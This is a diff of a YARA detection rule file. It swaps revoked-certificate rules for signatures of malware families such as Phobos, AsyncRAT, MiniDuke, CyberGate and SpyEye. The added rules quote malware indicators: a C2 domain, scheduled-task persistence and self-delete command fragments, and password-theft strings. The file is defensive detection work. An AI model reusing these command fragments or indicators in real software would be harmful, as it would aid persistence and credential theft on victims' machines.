+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_736Dcfd309Ea4C3Bea23287473Ffe071 : FILE
+rule DITEKSHEN_MALWARE_Win_Phobos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
-		author = "ditekSHen"
-		id = "058c4e85-e004-5fe0-9e16-9dbe333371f6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Phobos ransomware"
+		author = "ditekshen"
+		id = "7bf659ef-f2a1-5ee2-a334-c233e26a2526"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L263-L274"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3895-L3908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68a91e0e042606d49a5c83c972b0a6bf387c9d7d20c2df132edec717ab4603a0"
+		logic_hash = "bbf8eef0863e9d6423b3b0f938561b2be486b92b4f59b5d0b67f52dba536a582"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "8bfc13bf01e98e5b38f8f648f0f843b63af03f55"
-		importance = 20
+
+	strings:
+		$x1 = "\\\\?\\UNC\\\\\\e-" fullword wide
+		$x2 = "\\\\?\\ :" fullword wide
+		$x3 = "POST" fullword wide
+		$s1 = "ELVL" fullword wide
+		$s2 = /SUP\d{3}/ fullword wide
+		$s3 = { 41 31 47 ?? 41 2b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESTELLA, OOO" and pe.signatures [ i ] . serial == "73:6d:cf:d3:09:ea:4c:3b:ea:23:28:74:73:ff:e0:71" )
+		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 1 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_09C89De6F64A7Fdf657E69353C5Fdd44 : FILE
+rule DITEKSHEN_MALWARE_Win_Ratty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
-		author = "ditekSHen"
-		id = "613c4253-8a53-5faa-8376-10c9a35805cf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Ratty Java RAT"
+		author = "ditekshen"
+		id = "87719e28-dfe7-5366-8d90-65e6c0c6fb4f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L276-L287"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3910-L3929"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fcb517a4160226cf89c13b5b27310d1e8a02d3f164a338a8d2901ef604f1d8a"
+		logic_hash = "d90bca1b18023da8e60cb6ca86d1c562bff3867c6d5cf893dce605ebb92b9637"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7ad763dfdaabc1c5a8d1be582ec17d4cdcbd1aeb"
-		importance = 20
+
+	strings:
+		$s1 = "/rat/RattyClient.class" ascii
+		$s2 = "/rat/ActiveConnection.class" ascii
+		$s3 = "/rat/attack/" ascii
+		$s4 = "/rat/gui/swing/Ratty" ascii
+		$s5 = "/rat/packet/PasswordPacket" ascii
+		$s6 = "/rat/packet/" ascii
+		$e1 = "/engine/Keyboard.class" ascii
+		$e2 = "/engine/IMouseListener.class" ascii
+		$e3 = "/engine/Screen$ResizeBehavior.class" ascii
+		$e4 = "/engine/fx/ISoundListener.class" ascii
+		$e5 = "/engine/net/TCPServer.class" ascii
+		$e6 = "/engine/noise/PerlinNoise.class" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x4b50 ) and ( 3 of ( $s* ) or all of ( $e* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_03B630F9645531F8868Dae8Ac0F8Cfe6 : FILE
+rule DITEKSHEN_MALWARE_Win_Fatduke : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects FatDuke"
 		author = "ditekSHen"
-		id = "ca5203b8-3029-5914-b611-1717aefc7ccf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "dc80c0f0-c61c-5f0c-841b-3a75e8a1cef3"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L289-L300"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3931-L3946"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c388ee7cfc2f35d5e020520d0c5a04b872d5deff63fc551308168e60122f7fc"
+		logic_hash = "a7923d15b10098e9402614fe7107a6ba1d71512efa6e462d522ef64e13f82b47"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ab027825daf46c5e686e4d9bc9c55a5d8c5e957d"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\?\\Volume" fullword ascii
+		$s2 = "WINHTTP_AUTOPROXY_OPTIONS@@PAUWINHTTP_PROXY_INFO@@" ascii
+		$s3 = "WINHTTP_CURRENT_USER_IE_PROXY_CONFIG@@" ascii
+		$s4 = "Cannot write a Cannot find the too long string mber of records Log malfunction! Cannot create ain an invalid ra Internal sync iright function iWaitForSingleObjffsets" ascii
+		$pattern = "()$^.*+?[]|\\-{},:=!" ascii
+		$b64 = "eyJjb25maWdfaWQiOi" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $b64 and 2 of them ) or ( #pattern > 3 and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_020Bc03538Fbdc792F39D99A24A81B97 : FILE
+rule DITEKSHEN_MALWARE_Win_Miniduke : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects MiniDuke"
 		author = "ditekSHen"
-		id = "d5fd84b4-cccf-569d-96ea-26d9d21c6adf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "947cd414-d19d-5543-8961-94aef69cc94e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L302-L313"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3948-L3969"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "154d7d814ff0b1c2d85557211dd68d0bd82e9953a9912ac3c26475a1316b0cb3"
+		logic_hash = "c3ab139b4fda2ff9678ceecbdf5ac0c57536bd658f62aa9d19610028b0a5f92c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0ab2629e4e721a65ad35758d1455c1202aa643d3"
-		importance = 20
+
+	strings:
+		$s1 = "DefPipe" fullword ascii
+		$s2 = "term %5d" fullword ascii
+		$s3 = "pid %5d" fullword ascii
+		$s4 = "uptime %5d.%02dh" fullword ascii
+		$s5 = "login: %s\\%s" fullword ascii
+		$s6 = "Software\\Microsoft\\ApplicationManager" ascii
+		$s7 = { 69 64 6c 65 ?? 00 73 74 6f 70 ?? 00 61 63 63 65 70 74 ?? 00 63 6f 6e 6e 65 63 74 ?? 00 6c 69 73 74 65 6e ?? 00 }
+		$net1 = "salesappliances.com" ascii
+		$net2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" fullword ascii
+		$net3 = "http://10." ascii
+		$net4 = "JiM9t8g7j8KoJkLJlKqka8dbo7q5z4v5u3o4z" ascii
+		$net5 = "application/octet-stream" ascii
+		$net6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLOBAL PARK HORIZON SP Z O O" and pe.signatures [ i ] . serial == "02:0b:c0:35:38:fb:dc:79:2f:39:d9:9a:24:a8:1b:97" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $net* ) or 7 of them )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4E8D4Fc7D9F38Aca1169Fbf8Ef2Aaf50 : FILE
+rule DITEKSHEN_MALWARE_Win_Polyglotduke : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PolyGlotDuke"
 		author = "ditekSHen"
-		id = "03a23987-bbec-5072-bea4-56773bdc7d53"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "01ac90db-35f6-5192-8630-81000573b4f9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L315-L326"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3971-L3986"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2b440d21183745ac89de56f5ca22cf3f01be3212e20ce80fa67a45adbb6b16fe"
+		logic_hash = "c1fb8ea1d21768cbd65bd7b91e3f817fa97a0a933b511dff2ae4d5db49bdb2ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7239764d40118fc1574a0af77a34e369971ddf6d"
-		importance = 20
+
+	strings:
+		$s1 = { 48 b9 ff ff ff ff ff ff ff ff 51 48 23 8c 24 ?? 00 00 00 48 89 8C 24 00 00 00 00 }
+		$s2 = { 56 be ff ff ff ff 56 81 e6 7f }
+		$s3 = { 48 8b 05 19 ?4 4b 00 48 05 48 83 00 00 4c 8b 44 24 50 8b 54 24 48 48 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INFINITE PROGRAMMING LIMITED" and pe.signatures [ i ] . serial == "4e:8d:4f:c7:d9:f3:8a:ca:11:69:fb:f8:ef:2a:af:50" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) ) or ( 2 of them and pe.exports ( "InitSvc" ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_09830675Eb483E265C3153F0A77C3De9 : FILE
+rule DITEKSHEN_MALWARE_Win_Guidlma : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Guildma"
 		author = "ditekSHen"
-		id = "3370886e-6866-598b-b3bf-29c7f2537425"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "135ddc6a-5001-54c0-a66c-3e0e5fe6319f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L328-L339"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3988-L4006"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0a504ed2a2816602ac378a700567909812650f409626a7b2c1e25cf7f8cb51c"
+		logic_hash = "11a0d9c67139627b6820c928840d816ed22b48452ce0b2f856c86c183cdfc8ab"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "1bb5503a2e1043616b915c4fce156c34304505d6"
-		importance = 20
+
+	strings:
+		$v1_1 = "marxvxinhhm98.dll" fullword wide
+		$v1_2 = "marxvxinhhmxa.gif" fullword wide
+		$v1_3 = "marxvxinhhmxb.gif" fullword wide
+		$v1_4 = "c:\\programdata" fullword wide
+		$v1_5 = "\\tempa\\" fullword wide
+		$v2_1 = "C:\\Windows\\System32\\dllhost.exe" fullword ascii
+		$v2_2 = "C:\\Windows\\SysWOW64\\dllhost.exe" fullword ascii
+		$v2_3 = "C:\\Users\\Public\\go" fullword ascii
+		$v2_4 = ":%:*:/:>:C:H:W:\\:a:p:u:z:" fullword ascii
+		$v2_5 = ": :%:*:9:>:C:R:W:\\:k:p:u:" fullword ascii
+		$v2_6 = ":*:/:4:C:H:M:\\:a:f:u:z:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James LTH d.o.o." and pe.signatures [ i ] . serial == "09:83:06:75:eb:48:3e:26:5c:31:53:f0:a7:7c:3d:e9" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $v1* ) or 5 of ( $v2* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_351Fe2Efdc0Ac56A0C822Cf8 : FILE
+rule DITEKSHEN_MALWARE_Win_Cybergate : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects CyberGate/Spyrat/Rebhip RTA"
 		author = "ditekSHen"
-		id = "dcd82e7a-f235-5ff6-805b-0da7e0c0e385"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3b50ccfb-6603-5002-8ceb-e9252d4c7dff"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L341-L352"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4008-L4026"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a661adcd9366da7eab0aa8059bbe6236022f7513996603eb06c43a0b38ff4b85"
+		logic_hash = "b4a3c07533c2b251e1a714b28fb0b654c76881fb6ce970f6586c5908ee65609b"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		thumbprint = "4230bca4b7e4744058a7bb6e355346ff0bbeb26f"
-		importance = 20
+
+	strings:
+		$s1 = "UnitInjectLibrary" ascii
+		$s2 = "TLoader" fullword ascii
+		$s3 = "\\\\.\\SyserDbgMsg" fullword ascii
+		$s4 = "\\\\.\\SyserBoot" fullword ascii
+		$s5 = "\\signons" ascii
+		$s6 = "####@####" ascii
+		$s7 = "XX-XX-XX-XX" fullword ascii
+		$s8 = "EditSvr" ascii
+		$s9 = "_x_X_PASSWORDLIST_X_x_" fullword ascii
+		$s10 = "L$_RasDefaultCredentials#0" fullword ascii
+		$s11 = "password" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_07Bb6A9D1C642C5973C16D5353B17Ca4 : FILE
+rule DITEKSHEN_MALWARE_Win_WSHRATJS : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects WSHRAT JS variants"
 		author = "ditekSHen"
-		id = "a29590bb-d8f9-5842-81bd-f9a9f7cea642"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7dbaea67-48dc-5fb8-ba58-b0d6eeca207b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L354-L365"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4028-L4045"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "faecdcd78bc60f730bfe5a049fd0bd1309b44d185c0cbc81dfc326a162d5fcb2"
+		logic_hash = "9956ed4613ac403360ab0222a7ed62350fcd998710843bd6700717f8bbb5052e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9de562e98a5928866ffc581b794edfbc249a2a07"
-		importance = 20
+
+	strings:
+		$charset_full = "us-ascii" nocase ascii
+		$charset_begin = "\"us-\"" nocase ascii
+		$charset_end = "Array(97,115,99,105,105)" nocase ascii
+		$wsc_object1 = "WScript.CreateObject(\"System.Text.UTF8Encoding" nocase ascii
+		$wsc_object2 = "WScript.CreateObject(\"Adodb.Stream" nocase ascii
+		$wsc_object3 = "WScript.CreateObject(\"Microsoft.XmlDom" nocase ascii
+		$s1 = "function(){return" ascii
+		$s2 = "}catch(err){" ascii
+		$s3 = "{item: \"bin.base64\"}" nocase ascii
+		$s4 = "* 1].item =" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" )
+		filesize < 400KB and ( $charset_full or ( $charset_begin and $charset_end ) ) and 2 of ( $wsc_object* ) and 3 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : FILE
+rule DITEKSHEN_MALWARE_Win_Asyncrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects AsyncRAT"
 		author = "ditekSHen"
-		id = "e8dc8963-29c1-5306-bd7d-80ad9e1334d9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6465b50d-8f1a-5c09-84fd-cd1e5994e68f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L367-L378"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4047-L4074"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c433b63f9c875a564f424ecc8e9239701ce8be78cd0046c1eefca8cf732abca3"
-		score = 75
-		quality = 75
+		logic_hash = "073d4a8667fb1a48bf2bd503a551d7f78e38a6066feedc646d92c27fb7201fca"
+		score = 60
+		quality = 35
 		tags = "FILE"
-		thumbprint = "149b7bbe88d4754f2900c88516ce97be605553ff"
-		importance = 20
+
+	strings:
+		$x1 = "AsyncRAT" fullword ascii
+		$x2 = "AsyncRAT 0." wide
+		$x3 = /AsyncRAT\s[0-9]\.[0-9]\.[0-9][A-Z]/ fullword wide
+		$s1 = "/create /sc onlogon /rl highest /tn" fullword wide
+		$s2 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide
+		$s3 = "{{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}" fullword wide
+		$s4 = "Stub.exe" fullword ascii wide
+		$s5 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH" ascii wide
+		$s6 = "VirtualBox" fullword ascii wide
+		$s7 = "/target:winexe /platform:x86 /optimize+" fullword ascii wide
+		$s8 = "Win32_ComputerSystem" ascii wide
+		$s9 = "Win32_Process Where ParentProcessID=" ascii wide
+		$s10 = "etirWgeR.llehShsW" ascii wide
+		$s11 = "usbSpread" fullword ascii wide
+		$cnc1 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" fullword ascii wide
+		$cnc2 = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" fullword ascii wide
+		$cnc3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" fullword ascii wide
+		$cnc4 = "POST / HTTP/1.1" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" )
+		(( uint16( 0 ) == 0x5a4d and filesize < 4000KB ) and ( 1 of ( $x* ) or 6 of ( $s* ) or all of ( $cnc* ) or ( 4 of ( $s* ) and 2 of ( $cnc* ) ) ) ) or ( 1 of ( $x* ) or 6 of ( $s* ) or all of ( $cnc* ) or ( 4 of ( $s* ) and 2 of ( $cnc* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0C14B611A44A1Bae0E8C7581651845B6 : FILE
+rule DITEKSHEN_MALWARE_Win_Quilclipper
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects QuilClipper variants mostly in memory or extracted AutoIt script"
 		author = "ditekSHen"
-		id = "a6ebe304-e896-5cb3-8a49-ebffe0525601"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bd23ec5a-f21a-5133-a77a-de2615933b82"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L380-L391"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4076-L4094"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dae6318cf6f8e33e11af5c4b06379f8ef2744e784bb793c78f782b6a6286b84b"
+		logic_hash = "dcac93806a438b188ae70a679301cb6630b9eb6849bf8fbbb1cea5fed5e7cf75"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "c3288c7fbb01214c8f2dc3172c3f5c48f300cb8b"
-		importance = 20
+		tags = ""
+
+	strings:
+		$cnc1 = "QUILCLIPPER by" ascii
+		$cnc2 = "/ UserName:" ascii
+		$cnc3 = "/ System:" ascii
+		$s1 = "DLLCALL ( \"kernel32.dll\" , \"handle\" , \"CreateMutexW\" , \"struct*\"" ascii
+		$s2 = "SHELLEXECUTE ( @SCRIPTFULLPATH , \"\" , \"\" , FUNC_" ascii
+		$s3 = "CASE BITROTATE" ascii
+		$s4 = "CASE BITXOR" ascii
+		$s5 = "CLIP( FUNC_" ascii
+		$s6 = "CLIPPUT (" ascii
+		$s7 = "FUNC _CLIPPUTFILE(" ascii
+		$s8 = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" )
+		all of ( $cnc* ) or all of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0B1926A5E8Ae50A0Efa504F005F93869 : FILE
+rule DITEKSHEN_MALWARE_Win_Spyeye : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects SpyEye"
 		author = "ditekSHen"
-		id = "905a4b5c-3255-5f53-be54-429038378ee0"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "aa15220a-6fd4-5c5e-8287-957fc3c3fe52"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L393-L404"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4096-L4111"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "78d507f76d44ed982d12c293604d5c4fed14316cbc18473b7131bb89997bad28"
+		logic_hash = "352853d600d1f4fbc09e58b783eb4e13b335fefbfe89842873710f0a9085d107"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2052ed19dcb0e3dfff71d217be27fc5a11c0f0d4"
-		importance = 20
+
+	strings:
+		$x1 = "_CLEANSWEEP_" ascii wide
+		$x2 = "config.datUT" fullword ascii
+		$x3 = "webinjects.txtUT" fullword ascii
+		$s1 = "confirm:processCommand" fullword ascii
+		$s2 = "Smth wrong with navigate to REF-PAGE (err code: %d). 0_o" fullword ascii
+		$s3 = "(UTC%s%2.2f) %s" fullword wide
+		$s4 = "M\\F;u`r" fullword ascii
+		$s5 = "]YH0%Yn" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Bab6A2Aa84B495D9E554A4C42C0126D : FILE
+rule DITEKSHEN_MALWARE_Win_Renamer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Renamer/Tainp variants"
 		author = "ditekSHen"
-		id = "be364465-0cab-59cd-82a2-b7b16f260f34"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9e701bbe-d698-510a-b63d-3c1575dac7b0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L406-L417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4114-L4135"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9ecdf1107cba0767ac3fa52c7dd65a13015e4fd735da70b6f1e6dbcfe2f7526"
+		logic_hash = "df80657631f072bc1627e1cf503881a2c065396f8798d7f347259672f600198d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "230614366ddac05c9120a852058c24fa89972535"
-		importance = 20
+
+	strings:
+		$s1 = "shell\\open\\command=" fullword wide
+		$s2 = "icon=%SystemRoot%\\system32\\SHELL32.dll,4" fullword wide
+		$s3 = "DropTarget" ascii
+		$s4 = "C:\\Windows\\Paint" fullword wide
+		$s5 = "hold.inf" fullword wide
+		$s6 = "Dropped" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 4 of ( $s* ) and for any directory in pe.data_directories : ( directory.virtual_address != 0 and directory.size == 0 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_066226Cf6A4D8Ae1100961A0C5404Ff9 : FILE
+rule DITEKSHEN_MALWARE_Win_Epsilon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Epsilon ransomware"
 		author = "ditekSHen"
-		id = "75db8056-a5da-5db4-a837-84c5cc05f0fc"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c5561a0d-85ac-5137-a97e-310aa03eb787"
+		date = "2020-11-06"
